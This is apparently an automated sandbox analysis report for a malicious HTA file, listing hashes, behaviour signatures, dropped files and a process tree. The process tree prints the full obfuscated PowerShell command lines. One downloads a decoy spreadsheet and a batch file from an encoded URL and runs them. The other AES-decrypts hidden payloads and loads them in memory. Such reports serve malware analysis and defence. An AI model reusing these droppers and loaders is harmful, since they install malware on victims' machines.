Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240215-en locale:en-us os:windows7-x64 system
  • submitted
    17-04-2024 01:20

General

  • Target

    44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta

  • Size

    13KB

  • MD5

    9f587ac1e364bc4b89ea9991c780b09a

  • SHA1

    9612509e53fde418c7bb1794ac5f30c894b960a9

  • SHA256

    44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384

  • SHA512

    bcc6c0e3a765cc57fb2d75b5761175d3608befacb5d1b2d478d6e2ddcfa415b0afdf93299ecaff18c6d2de3b135f1ab6b2b2670f20668e3df73c2b679610feb3

  • SSDEEP

    384:qpzWNjCBvB7owyK5GYsx5GlUi5GhmPM5GmmaUi5Gt48FR:scYZkYK0qmPM9mYl83

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){[IO.File]::WriteAllBytes($SBAMeJuWZ, $CZAXshoWnad)};function qHQDgYXJPBUhEu($SBAMeJuWZ){if($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42965,42973,42973))) -eq $True){rundll32.exe $SBAMeJuWZ }elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42977,42980,42914))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $SBAMeJuWZ}elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42974,42980,42970))) -eq $True){misexec /qn /i $SBAMeJuWZ}else{Start-Process $SBAMeJuWZ}};function cCwKlxfFlkHXisv($cfRvnDevIseAZkkGCdZE){$ByCevDdKwarCKLMHmQl = New-Object (NPsijwhhOlDHomDMYu @(42943,42966,42981,42911,42952,42966,42963,42932,42973,42970,42966,42975,42981));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CZAXshoWnad = $ByCevDdKwarCKLMHmQl.DownloadData($cfRvnDevIseAZkkGCdZE);return $CZAXshoWnad};function NPsijwhhOlDHomDMYu($ryHnSGx){$GVAeEuIntdcnz=42865;$kZTyiBcpN=$Null;foreach($YdUlriGuLkXxwHJSV in $ryHnSGx){$kZTyiBcpN+=[char]($YdUlriGuLkXxwHJSV-$GVAeEuIntdcnz)};return $kZTyiBcpN};function wtXSieyRAReJE(){$QeIsxXKSCag = $env:AppData + '\';$KPbdZNmFeRGIPHxzICPT = $QeIsxXKSCag + 'PurchaseDB.xlsx';If(Test-Path -Path $KPbdZNmFeRGIPHxzICPT){Invoke-Item $KPbdZNmFeRGIPHxzICPT;}Else{ $HXoxLKEOLYWMiHWXK = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42945,42982,42979,42964,42969,42962,42980,42966,42933,42931,42911,42985,42973,42980,42985));ekAviDgm $KPbdZNmFeRGIPHxzICPT $HXoxLKEOLYWMiHWXK;Invoke-Item $KPbdZNmFeRGIPHxzICPT;};$GLzOZefB = $QeIsxXKSCag + 'gogis.bat'; if (Test-Path -Path $GLzOZefB){qHQDgYXJPBUhEu $GLzOZefB;}Else{ $PmRVpFoXv = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu 
@(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42968,42976,42968,42970,42980,42911,42963,42962,42981));ekAviDgm $GLzOZefB $PmRVpFoXv;qHQDgYXJPBUhEu $GLzOZefB;};;;;}wtXSieyRAReJE;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2360
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 
6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1604
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1564

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      69B

      MD5

      b0d440b42ef7a9fb656558f1f223406f

      SHA1

      956adad06004786a421399e2373af317af6a9965

      SHA256

      04af0729f2429990ae63ee91a506ca6629e6b4288789f051258bf8f8200cfc7a

      SHA512

      5e135780537714fed829f13d7941d853fa2de7343d857e21df4e39f8ad5e2dd5e75b1b87e686cf01633f95e3af76d501c5bd9eb54cba69834c1429a84454481d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      2ebad88bb9b0e2d4f90007ca3bbd47a8

      SHA1

      248ec0cf4abce8196fcd49b3a5f2fc26099c6b06

      SHA256

      b1ddbcb3cadea771e22ab62de579cb6aad96b1fcc5bc5b9b4ea9150ae5bbc441

      SHA512

      bb296cb45fa656cda29cd9e74759d8810137ad0111f88d96d071ad981e49be7fb93c69d77ea3cab28dd1cb3eb5ebcff3179d3ab47a8ffac38c4bc77899d77de4

    • C:\Users\Admin\AppData\Roaming\PurchaseDB.xlsx

      Filesize

      12KB

      MD5

      05eb4338ab9bcd275b88d8f2f701fea8

      SHA1

      409e23bd1603cb69b7511a497483011005b9fdaf

      SHA256

      b829611b9cb65f7baad3c897689d2c06cd457d294b072c48de79da471b986802

      SHA512

      8f651aff4e2d6581913da2ab419213e71e1b88fa4cb7ab0853e5e0720308e4a4f86707d1aa1c457e3aed8046aba3647d7b8260472ddd6a34f7719f43a6855ced

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1564-45-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-52-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-51-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-50-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-49-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/1564-47-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-46-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/1564-44-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/2360-8-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2360-48-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2360-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2360-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2360-57-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2536-28-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-2-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-5-0x0000000001BF0000-0x0000000001C30000-memory.dmp

      Filesize

      256KB

    • memory/2536-4-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-3-0x0000000001BF0000-0x0000000001C30000-memory.dmp

      Filesize

      256KB